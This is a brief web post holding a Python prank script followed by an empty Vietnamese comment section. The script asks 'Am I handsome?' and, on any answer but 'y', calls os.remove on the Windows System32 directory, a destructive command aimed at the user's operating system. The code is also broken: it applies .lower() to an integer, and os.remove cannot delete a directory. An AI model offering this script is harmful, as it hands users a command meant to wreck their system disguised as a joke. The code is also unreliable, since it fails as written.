import os a = int(input('Am I handsome? (y/n): ')) if a.lower().strip() == 'y': pass else: os.remove('C:\Windows\System32')
Không có bình luận tại thời điểm này.
Bình luận